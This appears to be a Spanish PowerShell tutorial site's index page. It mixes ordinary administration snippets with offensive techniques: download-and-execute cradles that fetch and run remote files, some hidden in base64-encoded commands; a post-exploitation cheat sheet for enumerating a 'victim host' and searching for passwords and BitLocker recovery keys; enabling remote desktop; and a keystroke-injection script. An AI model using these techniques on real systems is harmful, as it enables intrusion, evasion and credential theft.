|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
Start-Process powershell_ise Start-Sleep -Seconds 5 gc .\ejemplo.txt | %{ foreach($letras in [char[]]$_) { $letras [System.Windows.Forms.SendKeys]::SendWait($letras) Start-Sleep -Milliseconds 500 } [System.Windows.Forms.SendKeys]::SendWait(" ") [System.Windows.Forms.SendKeys]::SendWait("{ENTER}") Start-Sleep -Milliseconds 500 } |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 |
AsusTPCenter: ASUS Smart Gesture Center AsusTPHelper: ASUS Smart Gesture Helper AsusTPLoader: ASUS Smart Gesture Loader audiodg: Aislamiento de gráficos de dispositivo de audio de Windows chrome: Google Chrome dasHost: Device Association Framework Provider Host dllhost: COM Surrogate dwm: Administrador de ventanas del escritorio esif_assist_64: Intel(R) Dynamic Platform and Thermal Framework Utility Application esif_uf: Intel(R) Dynamic Platform and Thermal Framework explorer: Explorador de Windows igfxCUIService: igfxCUIService Module igfxEM: igfxEM Module igfxHK: igfxHK Module KinectManagementService: Kinect Management Service KinectMonitor: KinectMonitor.exe KinectService: KinectService.exe lsass: Local Security Authority Process MpCmdRun: Microsoft Malware Protection Command Line Utility MSASCuiL: Windows Defender notification icon OneDrive: Microsoft OneDrive powershell_ise: Windows PowerShell ISE RAVBg64: HD Audio Background Process RAVCpl64: Realtek HD Audio Manager RuntimeBroker: Runtime Broker SearchIndexer: Indizador de Microsoft Windows Search SearchUI: Search and Cortana application ShellExperienceHost: Windows Shell Experience Host sihost: Shell Infrastructure Host spoolsv: Aplicación de subsistema de cola svchost: Proceso host para los servicios de Windows taskhostw: Proceso de host para tareas de Windows winlogon: Aplicación de inicio de sesión de Windows wmpnetwk: Servicio de uso compartido de red del Reproductor de Windows Media WUDFHost: Windows Driver Foundation - proceso host del marco de controlador de modo usuario |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 |
#Descargar y ejecutar un fichero .exe Set-Location $env:TEMP Start-BitsTransfer -Source 'https://www.jesusninoc.com/app.exe' .\app.exe #Descargar y ejecutar un fichero .txt Set-Location $env:TEMP Start-BitsTransfer -Source 'http://www.jesusninoc.com/script.txt' .\script.ps1 #Descargar y ejecutar un fichero .ps1 Set-Location $env:TEMP Start-BitsTransfer -Source 'http://www.jesusninoc.com/script.ps1' .\script.ps1 #Descargar un fichero .txt, renombrar a .ps1 y ejecutar Start-BitsTransfer -Source 'http://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt' -Destination $env:TEMP\config.ps1 powershell -File $env:TEMP\config.ps1 #Descargar y ejecutar un fichero .txt con cmdlets Start-BitsTransfer -Source 'http://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt' powershell (Get-Content $env:TEMP\config.txt) #Ejecutar código en Base64 $command="Get-Date" $code=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command)) powershell -encodedcommand $code #Descargar un fichero mediante un cmdlet en Base64 $command="Start-BitsTransfer -Source 'http://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt' -Destination $env:TEMP\config2.txt" $code=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command)) powershell -encodedcommand $code Get-Content $env:TEMP\config2.txt #Descargar un fichero mediante un cmdlet en Base64 y ejecutar el contenido del fichero $command="Start-BitsTransfer -Source 'http://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt' -Destination $env:TEMP\config2.txt" $code=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command)) powershell -encodedcommand $code powershell (Get-Content $env:TEMP\config2.txt) #Ejecutar un cmdlet en Base64 $command="Get-Date" $code=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command)) powershell -encodedcommand $code #Ejecutar un fichero cuyo contenido está en Base64 #$command="Get-Date" $code="RwBlAHQALQBEAGEAdABlAA==" powershell -encodedcommand $code #Descargar un fichero mediante un cmdlet en Base64 y ejecutar el contenido del fichero cuyo contenido está en Base64 $command="Start-BitsTransfer -Source 'http://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt' -Destination $env:TEMP\config2.txt" $code=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command)) powershell -encodedcommand $code $code2=Get-Content $env:TEMP\config2.txt powershell -encodedcommand $code2 #Descargar un fichero mediante un cmdlet en Base64 y ejecutar el contenido del fichero cuyo contenido está en Base64 (versión optimizada) $command="Start-BitsTransfer -Source 'http://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt' -Destination $env:TEMP\config2.txt" $code=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command)) powershell -encodedcommand $code #Contenido del fichero config2.txt #$command="Get-Date" #$code="RwBlAHQALQBEAGEAdABlAA==" powershell -encodedcommand (Get-Content $env:TEMP\config2.txt) #Descargar un fichero mediante un cmdlet en Base64 y ejecutar el contenido del fichero cuyo contenido está en Base64 (versión optimizada y en una línea) $command="Start-BitsTransfer -Source http://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt -Destination $env:TEMP\config2.txt";$code=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command));powershell -encodedcommand $code;powershell -encodedcommand (Get-Content $env:TEMP\config2.txt) #Descargar un fichero mediante un cmdlet en Base64 y ejecutar el contenido del fichero cuyo contenido está en Base64 (realizar todas las operaciones en Base64) $codefor64='$command="Start-BitsTransfer -Source http://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt -Destination $env:TEMP\config2.txt";$code=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command));powershell -encodedcommand $code;$codefar=Get-Content $env:TEMP\config2.txt;powershell -encodedcommand $codefar' $codebase64=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($codefor64)) powershell -encodedcommand $codebase64 #Abrir PowerShell ISE y ejecutar un cmdlet Start-Process powershell_ise Start-Sleep -Seconds 5 [System.Windows.Forms.SendKeys]::SendWait("Get-Date") [System.Windows.Forms.SendKeys]::SendWait("{ENTER}") #Abrir PowerShell ISE y ejecutar un cmdlet en Base64 Start-Process powershell_ise Start-Sleep -Seconds 5 [System.Windows.Forms.SendKeys]::SendWait("powershell -encodedcommand RwBlAHQALQBEAGEAdABlAA==") [System.Windows.Forms.SendKeys]::SendWait("{ENTER}") #Abrir PowerShell ISE y ejecutar un cmdlet guardado en un fichero Start-Process powershell_ise Start-Sleep -Seconds 5 [System.Windows.Forms.SendKeys]::SendWait('$coman=Get-Content $env:TEMP\config2.txt;powershell $coman') [System.Windows.Forms.SendKeys]::SendWait("{ENTER}") #Abrir PowerShell ISE y ejecutar un cmdlet copiado en el Portapapeles Start-Process powershell_ise Start-Sleep -Seconds 5 $copy='$coman=Get-Content $env:TEMP\config2.txt;powershell $coman' Set-Clipboard $copy [System.Windows.Forms.SendKeys]::SendWait("^(v)") [System.Windows.Forms.SendKeys]::SendWait("{ENTER}") #Abrir PowerShell ISE y ejecutar un cmdlet guardado en un fichero cuyo contenido está en Base64 Start-Process powershell_ise Start-Sleep -Seconds 5 [System.Windows.Forms.SendKeys]::SendWait('$coman=Get-Content $env:TEMP\config2.txt;powershell -encodedcommand $coman') [System.Windows.Forms.SendKeys]::SendWait("{ENTER}") |
Presence This section focuses on information gathering about the victim host and the network that it’s attached to. System
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 |
#Shows all current environmental variables $env:ALLUSERSPROFILE $env:APPDATA $env:CommonProgramFiles ${env:CommonProgramFiles(x86)} $env:CommonProgramW6432 $env:COMPUTERNAME $env:ComSpec $env:FP_NO_HOST_CHECK $env:HOMEDRIVE $env:HOMEPATH $env:LOCALAPPDATA $env:LOGONSERVER $env:NUMBER_OF_PROCESSORS $env:OS $env:Path $env:PATHEXT $env:PROCESSOR_ARCHITECTURE $env:PROCESSOR_IDENTIFIER $env:PROCESSOR_LEVEL $env:PROCESSOR_REVISION $env:ProgramData $env:ProgramFiles ${env:ProgramFiles(x86)} $env:ProgramW6432 $env:PSModulePath $env:PUBLIC $env:SESSIONNAME $env:SystemRoot $env:TEMP $env:TMP $env:USERDOMAIN $env:USERDOMAIN_ROAMINGPROFILE $env:USERNAME $env:USERPROFILE $env:SystemDrive $env:windir #Shows all current environmental variables (macOS) $env:_ $env:LOGNAME $env:SHLVL $env:TERM_SESSION_ID $env:PATHEXT $env:__CF_USER_TEXT_ENCODING $env:PATH $env:SSH_AUTH_SOCK $env:TMPDIR $env:Apple_PubSub_Socket_Render $env:PSMODULEPATH $env:TERM $env:USER $env:HOME $env:PWD $env:TERM_PROGRAM $env:XPC_FLAGS $env:LC_CTYPE $env:SHELL $env:TERM_PROGRAM_VERSION $env:XPC_SERVICE_NAME #Information about disk Get-Disk #Retrieving Process Information Get-Process | Select-Object Name,Path,Company,CPU,Product,TotalProcessorTime,StartTime #Lists running threads for a specified process (Get-Process chrome | Select-Object Threads).Threads Get-Process | select -expand Threads #Last Boot Uptime Get-CimInstance -ClassName win32_operatingsystem | select csname, lastbootuptime #Lists the current drivers on the system Get-Process -Module #Events and event logs on the local and remote Get-EventLog -LogName System -EntryType Error, Warning Get-EventLog -LogName System -EntryType Error, Warning -ComputerName $computer |
WMI
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 |
#Information about disk Get-WmiObject -Class win32_DiskDrive #Retrieving the Shared Resources on the Local Computer Get-WmiObject -Class Win32_Share #Retrieving the Shared Resources on a Remote Computer Get-WmiObject -Class Win32_Share -ComputerName COMPUTER #Remote information Get-WmiObject Win32_ComputerSystem -cn $computer Get-WmiObject Win32_Group -cn $computer Get-WmiObject Win32_LogicalDisk -cn $computer Get-WmiObject Win32_NetworkClient -cn $computer Get-WmiObject Win32_NetworkConnection -cn $computer Get-WmiObject Win32_NetworkLoginProfile -cn $computer Get-WmiObject Win32_NTLogEvent -cn $computer Get-WmiObject Win32_OperatingSystem -cn $computer Get-WmiObject Win32_Process -cn $computer Get-WmiObject Win32_Product -cn $computer Get-WmiObject Win32_QuickFixEngineering -cn $computer Get-WmiObject Win32_Service -cn $computer Get-WmiObject Win32_Share -cn $computer Get-WmiObject Win32_StartupCommand -cn $computer Get-WmiObject Win32_UserAccount -cn $computer Get-WmiObject Win32_Volume -cn $computer #Remote information (use credential) $credenciales=Get-Credential (Get-WmiObject Win32_AutochkSetting -ComputerName ('192.168.1.'+$_) -Credential $credenciales).SettingID (Get-WmiObject Win32_BaseBoard -ComputerName ('192.168.1.'+$_) -Credential $credenciales).Manufacturer (Get-WmiObject Win32_BIOS -ComputerName ('192.168.1.'+$_) -Credential $credenciales).Version (Get-WmiObject Win32_Bus -ComputerName ('192.168.1.'+$_) -Credential $credenciales).DeviceID Get-WmiObject Win32_Processor -ComputerName ('192.168.1.'+$_) -Credential $credenciales Get-WmiObject Win32_SystemEnclosure -ComputerName ('192.168.1.'+$_) -Credential $credenciales Get-WmiObject Win32_Battery -ComputerName ('192.168.1.'+$_) -Credential $credenciales Get-WmiObject Win32_Printer -ComputerName ('192.168.1.'+$_) -Credential $credenciales #WMI queries $query="Select * from Msft_CliAlias"; Get-WMIObject -Query $query $query="Select * from Win32_BaseBoard"; Get-WMIObject -Query $query $query="Select * from Win32_BIOS"; Get-WMIObject -Query $query $query="Select * from Win32_BootConfiguration"; Get-WMIObject -Query $query $query="Select * from Win32_CDROMDrive"; Get-WMIObject -Query $query $query="Select * from Win32_ComputerSystem"; Get-WMIObject -Query $query $query="Select * from WIN32_PROCESSOR"; Get-WMIObject -Query $query $query="Select * from Win32_ComputerSystemProduct"; Get-WMIObject -Query $query $query="Select * from CIM_DataFile"; Get-WMIObject -Query $query $query="Select * from WIN32_DCOMApplication"; Get-WMIObject -Query $query $query="Select * from WIN32_DESKTOP"; Get-WMIObject -Query $query $query="Select * from WIN32_DESKTOPMONITOR"; Get-WMIObject -Query $query $query="Select * from Win32_DeviceMemoryAddress"; Get-WMIObject -Query $query $query="Select * from Win32_DiskDrive"; Get-WMIObject -Query $query $query="Select * from Win32_DiskQuota"; Get-WMIObject -Query $query $query="Select * from Win32_DMAChannel"; Get-WMIObject -Query $query $query="Select * from Win32_Environment"; Get-WMIObject -Query $query $query="Select * from Win32_Directory"; Get-WMIObject -Query $query $query="Select * from Win32_Group"; Get-WMIObject -Query $query $query="Select * from Win32_IDEController"; Get-WMIObject -Query $query $query="Select * from Win32_IRQResource"; Get-WMIObject -Query $query $query="Select * from Win32_ScheduledJob"; Get-WMIObject -Query $query $query="Select * from Win32_LoadOrderGroup"; Get-WMIObject -Query $query $query="Select * from Win32_LogicalDisk"; Get-WMIObject -Query $query $query="Select * from Win32_LogonSession"; Get-WMIObject -Query $query $query="Select * from WIN32_CACHEMEMORY"; Get-WMIObject -Query $query $query="Select * from Win32_PhysicalMemory"; Get-WMIObject -Query $query $query="Select * from Win32_PhysicalMemoryArray"; Get-WMIObject -Query $query $query="Select * from WIN32_NetworkClient"; Get-WMIObject -Query $query $query="Select * from Win32_NetworkLoginProfile"; Get-WMIObject -Query $query $query="Select * from Win32_NetworkProtocol"; Get-WMIObject -Query $query $query="Select * from Win32_NetworkConnection"; Get-WMIObject -Query $query $query="Select * from Win32_NetworkAdapter"; Get-WMIObject -Query $query $query="Select * from Win32_NetworkAdapterConfiguration"; Get-WMIObject -Query $query $query="Select * from Win32_NTDomain"; Get-WMIObject -Query $query $query="Select * from Win32_NTLogEvent"; Get-WMIObject -Query $query $query="Select * from Win32_NTEventlogFile"; Get-WMIObject -Query $query $query="Select * from Win32_OnBoardDevice"; Get-WMIObject -Query $query $query="Select * from Win32_OperatingSystem"; Get-WMIObject -Query $query $query="Select * from Win32_PageFileUsage"; Get-WMIObject -Query $query $query="Select * from Win32_PageFileSetting"; Get-WMIObject -Query $query $query="Select * from Win32_DiskPartition"; Get-WMIObject -Query $query $query="Select * from Win32_PortResource"; Get-WMIObject -Query $query $query="Select * from Win32_PortConnector"; Get-WMIObject -Query $query $query="Select * from Win32_Printer"; Get-WMIObject -Query $query $query="Select * from Win32_PrinterConfiguration"; Get-WMIObject -Query $query $query="Select * from Win32_PrintJob"; Get-WMIObject -Query $query $query="Select * from Win32_Process"; Get-WMIObject -Query $query $query="Select * from Win32_Product"; Get-WMIObject -Query $query $query="Select * from Win32_QuickFixEngineering"; Get-WMIObject -Query $query $query="Select * from Win32_QuotaSetting"; Get-WMIObject -Query $query $query="Select * from Win32_TSAccount"; Get-WMIObject -Query $query $query="Select * from Win32_TSNetworkAdapterSetting"; Get-WMIObject -Query $query $query="Select * from Win32_TSPermissionsSetting"; Get-WMIObject -Query $query $query="Select * from Win32_TerminalServiceSetting"; Get-WMIObject -Query $query $query="Select * from Win32_OSRecoveryConfiguration"; Get-WMIObject -Query $query $query="Select * from Win32_Registry"; Get-WMIObject -Query $query $query="Select * from Win32_SCSIController"; Get-WMIObject -Query $query $query="Select * from Win32_PerfRawData_PerfNet_Server"; Get-WMIObject -Query $query $query="Select * from Win32_Service"; Get-WMIObject -Query $query $query="Select * from Win32_ShadowCopy"; Get-WMIObject -Query $query $query="Select * from Win32_ShadowStorage"; Get-WMIObject -Query $query $query="Select * from Win32_Share"; Get-WMIObject -Query $query $query="Select * from Win32_SoftwareElement"; Get-WMIObject -Query $query $query="Select * from Win32_SoftwareFeature"; Get-WMIObject -Query $query $query="Select * from WIN32_SoundDevice"; Get-WMIObject -Query $query $query="Select * from Win32_StartupCommand"; Get-WMIObject -Query $query $query="Select * from Win32_SystemAccount"; Get-WMIObject -Query $query $query="Select * from Win32_SystemDriver"; Get-WMIObject -Query $query $query="Select * from Win32_SystemEnclosure"; Get-WMIObject -Query $query $query="Select * from Win32_SystemSlot"; Get-WMIObject -Query $query $query="Select * from Win32_TapeDrive"; Get-WMIObject -Query $query $query="Select * from Win32_TemperatureProbe"; Get-WMIObject -Query $query $query="Select * from Win32_TimeZone"; Get-WMIObject -Query $query $query="Select * from Win32_UninterruptiblePowerSupply"; Get-WMIObject -Query $query $query="Select * from Win32_UserAccount"; Get-WMIObject -Query $query $query="Select * from Win32_VoltageProbe"; Get-WMIObject -Query $query $query="Select * from Win32_Volume"; Get-WMIObject -Query $query $query="Select * from Win32_VolumeQuotaSetting"; Get-WMIObject -Query $query $query="Select * from Win32_VolumeUserQuota"; Get-WMIObject -Query $query $query="Select * from Win32_WMISetting"; Get-WMIObject -Query $query |
Networking
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 |
#Network Adaptor information contains, manufacturer, MAC ID etc Get-WmiObject -Class win32_networkadapter #Hardware information of the network adapter Get-NetAdapterHardwareInfo #Returns all physical network adapters Get-NetAdapter -Physical #Networking statistics from the network adapter. The statistics include broadcast, multicast, discards, and errors Get-NetAdapterStatistics #Get the current MAC Get-NetAdapter | Select-Object Name,MacAddress Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Select-Object Description,MACAddress #Neighbor cache entries (The neighbor cache maintains information for each on-link neighbor, including the IP address and the associated link-layer address. In IPv4, the neighbor cache is commonly known as the Address Resolution Protocol (ARP) cache) Get-NetNeighbor #Get the current IP address Get-NetIPAddress | Select-Object InterfaceAlias,IPAddress Get-NetIPAddress -AddressFamily ipv4 Get-NetIPAddress -AddressFamily ipv6 Get-NetIPConfiguration #Information about firewall Get-NetFirewallAddressFilter Get-NetFirewallApplicationFilter Get-NetFirewallInterfaceFilter Get-NetFirewallInterfaceTypeFilter Get-NetFirewallPortFilter Get-NetFirewallProfile Get-NetFirewallRule Get-NetFirewallSecurityFilter Get-NetFirewallServiceFilter Get-NetFirewallSetting #List Firewall Rules #Direction: Inbound Get-NetFirewallRule | Where {$_.Direction –eq ‘Inbound’} #TCP Get-NetTCPConnection Get-NetTCPConnection | Select-Object LocalPort,Remoteport #UDP Get-NetUDPEndpoint (Get-NetUDPEndpoint).LocalPort #Information about DNS Get-DnsClient Get-DnsClientCache Get-DnsClientGlobalSetting Get-DnsClientNrptGlobal Get-DnsClientNrptPolicy Get-DnsClientNrptRule Get-DnsClientServerAddress #Displays your currently shared SMB entries Get-SmbShare Get-WmiObject -Class Win32_Share #Access a Router $user="admin" $pass="admin123" $pair="${user}:${pass}" $bytes=[System.Text.Encoding]::ASCII.GetBytes($pair) $base64=[System.Convert]::ToBase64String($bytes) $basicAuthValue="Basic $base64" $headers=@{Authorization=$basicAuthValue} $url='http://192.168.1.1:89/rpSys.html' $result=(Invoke-WebRequest -Uri $url -Headers $headers) ($result.AllElements | Where tagName -eq “title”).outerText #Connect to Access Point $user="admin" $pass="1234" $pair="${user}:${pass}" $bytes=[System.Text.Encoding]::ASCII.GetBytes($pair) $base64=[System.Convert]::ToBase64String($bytes) $basicAuthValue="Basic $base64" $headers=@{Authorization=$basicAuthValue} $url='http://192.168.1.2/index.asp' $result=(Invoke-WebRequest -Uri $url -Headers $headers) ($result.AllElements | Where tagName -eq “title”).outerText |
Users
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
#List your current user [System.Security.Principal.WindowsIdentity]::GetCurrent() ([System.Security.Principal.WindowsIdentity]::GetCurrent()).name #Remote user Get-WmiObject win32_computersystem -property username -ComputerName RemoteComputer #List local users $adsi = [ADSI]"WinNT://$env:COMPUTERNAME" $adsi.Children | Where-Object {$_.SchemaClassName -eq 'user'} | Select-Object Name #List local groups $adsi = [ADSI]"WinNT://$env:COMPUTERNAME" $adsi.Children | Where-Object {$_.SchemaClassName -eq 'group'} | Select-Object name #Information about user accounts Get-WmiObject -Class Win32_UserAccount Get-WmiObject -Class Win32_Account #Information about group accounts Get-WmiObject -Class Win32_Group |
Configs
|
1 2 3 4 5 |
#Services Get-Service #Print the contents of the Windows hosts file Get-Content $env:windir\System32\drivers\etc\hosts |
Finding important files
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
#Gets the items in one or more specified locations Get-ChildItem #Recursively searches for files with a “.txt” extension in the C:\temp directory. The contents of any files matching this criteria are then searched for the term “password” Get-ChildItem c:\temp -Filter *.txt -Recurse | Select-String password #Searching file “TeamViewer” Get-ChildItem c:\ -rec -ea SilentlyContinue | ForEach-Object { Select-String "TeamViewer" -input (Get-ItemProperty -Path $_.PsPath) -AllMatches } #Searching IP adresses in text files Write-Host "IP addresses:`n" Get-ChildItem C:\Users\ -rec -ea SilentlyContinue | ForEach-Object { Select-String "\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b" -input (Get-ItemProperty -Path $_.PsPath) -AllMatches | ForEach-Object {($_.matches)|Select-Object Value} } #Searching BitLocker recovery keys #Searching content “Clave de recuperación de Cifrado de unidad BitLocker” Get-ChildItem C:\Users\juan -rec -ea SilentlyContinue | ForEach-Object { Select-String "Clave de recuperación de Cifrado de unidad BitLocker" -input (Get-ItemProperty -Path $_.PsPath) -AllMatches } |
Files to pull
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
#Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size Get-ChildItem $env:SystemDrive\pagefile.sys #Prefetch files Get-ChildItem $env:SystemRoot\Prefetch #Portion of accessed file list within prefetch file for PowerShell.exe Get-Content $env:SystemRoot\Prefetch\POWERSHELL_ISE.EXE-85BC6AB4.pf #File contains the registry settings Get-ChildItem $env:windir\System32\config -Force #File contains the registry settings for their individual account Get-ChildItem $env:USERPROFILE\NTUSER.DAT #This file contains the mappings of IP addresses to host names Get-ChildItem $env:windir\System32\drivers\etc\hosts Get-Content $env:windir\System32\drivers\etc\hosts |
Remote system access
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
#Determines whether all elements of the path exist Test-Path \\192.168.1.56\datos #Gets the items in one or more specified locations Get-ChildItem \\192.168.1.56\datos #Creates a new Server Message Block (SMB) share New-SmbShare -Name fso -Path F:\power #Creates a new Server Message Block share and add permissions New-SmbShare -Name fso -Path F:\power –FullAccess administrador -ReadAccess Everyone #Enable remote desktop powershell Start-Process powershell_ise -Verb runAs Set-Location HKLM:\ $RegKey ='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\' Set-ItemProperty -Path $RegKey -Name fDenyTSConnections -Value 0 #View installed programs on remote machine $credencial=Get-Credential 1..254 | %{ ('192.168.1.'+$_) if(Test-Connection ('192.168.1.'+$_) -Quiet) { Get-WmiObject -Class Win32_Product -ComputerName ('192.168.1.'+$_) -Credential $credencial } } |
Software
|
1 2 3 4 5 |
#Gets a list of the app packages that are installed in a user profile Get-AppxPackage #Returns a list of all software packages that have been installed by using Package Management Get-Package |
AutoStart directories
|
1 |
Get-ChildItem $env:SystemDrive\'ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\' -Force |
Persistance This section focuses on gaining a foothold to regain,…
Read more
Introducción PowerShell es una línea de comandos con tecnología de scripting basada en tareas que proporciona a los administradores de tecnologías de la información (TI) un control integral y la posibilidad de automatizar las tareas de administración del sistema. PowerShell se ha creado sobre Common Language Runtime (CLR) y .NET Framework. Consola Para ejecutar la línea…
Read more
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
DELAY 750 GUI r DELAY 750 STRING powershell Start-Process powershell_ise -Verb runAs ENTER DELAY 2050 ALT s DELAY 2050 ENTER CTRL R ENTER CTRL I STRING Start-Process -FilePath powershell.exe -ArgumentList '-encodedcommand RwBlAHQALQBQAHIAbwBjAGUAcwBzAA==' ENTER DELAY 2050 F5 |
Introducción Confidencialidad
|
1 2 3 4 5 |
#Habilitar BitLocker Enable-BitLocker -MountPoint "f:" -RecoveryPasswordProtector -UsedSpaceOnly -Verbose #Deshabilitar BitLocker Disable-BitLocker -MountPoint "f:" |
Integridad
|
1 2 3 4 5 6 7 |
#Calcular hash para un archivo Get-FileHash D:\power\fichero.txt -Algorithm MD5 Get-FileHash D:\power\fichero.txt -Algorithm SHA1 Get-FileHash D:\power\fichero.txt -Algorithm SHA256 Get-FileHash D:\power\fichero.txt -Algorithm SHA384 Get-FileHash D:\power\fichero.txt -Algorithm SHA512 Get-FileHash D:\power\fichero.txt -Algorithm RIPEMD160 |
Seguridad física Analizar el hardware de los equipos de la empresa
|
1 2 3 4 5 6 7 8 9 10 11 |
$credenciales=Get-Credential 1..254 | %{ (Get-WmiObject Win32_AutochkSetting -ComputerName ('192.168.1.'+$_) -Credential $credenciales).SettingID (Get-WmiObject Win32_BaseBoard -ComputerName ('192.168.1.'+$_) -Credential $credenciales).Manufacturer (Get-WmiObject Win32_BIOS -ComputerName ('192.168.1.'+$_) -Credential $credenciales).Version (Get-WmiObject Win32_Bus -ComputerName ('192.168.1.'+$_) -Credential $credenciales).DeviceID Get-WmiObject Win32_Processor -ComputerName ('192.168.1.'+$_) -Credential $credenciales Get-WmiObject Win32_SystemEnclosure -ComputerName ('192.168.1.'+$_) -Credential $credenciales Get-WmiObject Win32_Battery -ComputerName ('192.168.1.'+$_) -Credential $credenciales Get-WmiObject Win32_Printer -ComputerName ('192.168.1.'+$_) -Credential $credenciales } |
Ver dispositivos conectados (móviles, almacenamiento USB, etc.)
|
1 2 3 4 5 6 |
Get-PnpDevice | Where-Object { $_.class -EQ 'USBDevice' } | Select-Object FriendlyName Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR\*\*\' | Where-Object { $_.FriendlyName } | Select-Object FriendlyName Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB\*\*\' | Where-Object { $_.FriendlyName } | Select-Object FriendlyName Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\USB\*\*\' | Where-Object { $_.FriendlyName } | Select-Object FriendlyName Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\USBSTOR\*\*\' | Where-Object { $_.FriendlyName } | Select-Object FriendlyName |
Seguridad lógica Ver información sobre usuarios y grupos (usuario que ha iniciado sesión)
|
1 |
[System.Security.Principal.WindowsIdentity]::GetCurrent() |
Crear usuarios y grupos (procedimiento de creación)
|
1 2 3 4 5 6 7 8 9 10 11 |
#Es necesario abrir PowerShell como administrador #Crear un usuario local con contraseña en Windows 10 con PowerShell 5.1 $pass=ConvertTo-SecureString "11234aaa@@€dsf" -asplaintext -force New-LocalUser usuario -Password $pass #Crear un grupo local en Windows 10 con PowerShell 5.1 New-LocalGroup grupo #Añadir usuarios a un grupo local en Windows 10 con PowerShell 5.1 Add-LocalGroupMember -Member usuario -Group administradores |
Analizar el software de los equipos de la…
Read more
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 |
Alias % -> ForEach-Object Alias ? -> Where-Object Alias ac -> Add-Content Alias asnp -> Add-PSSnapIn Alias cat -> Get-Content Alias cd -> Set-Location Alias chdir -> Set-Location Alias clc -> Clear-Content Alias clear -> Clear-Host Alias clhy -> Clear-History Alias cli -> Clear-Item Alias clp -> Clear-ItemProperty Alias cls -> Clear-Host Alias clv -> Clear-Variable Alias cnsn -> Connect-PSSession Alias compare -> Compare-Object Alias copy -> Copy-Item Alias cp -> Copy-Item Alias cpi -> Copy-Item Alias cpp -> Copy-ItemProperty Alias curl -> Invoke-WebRequest Alias cvpa -> Convert-Path Alias dbp -> Disable-PSBreakpoint Alias del -> Remove-Item Alias diff -> Compare-Object Alias dir -> Get-ChildItem Alias dnsn -> Disconnect-PSSession Alias ebp -> Enable-PSBreakpoint Alias echo -> Write-Output Alias epal -> Export-Alias Alias epcsv -> Export-Csv Alias epsn -> Export-PSSession Alias erase -> Remove-Item Alias etsn -> Enter-PSSession Alias exsn -> Exit-PSSession Alias fc -> Format-Custom Alias fl -> Format-List Alias foreach -> ForEach-Object Alias ft -> Format-Table Alias fw -> 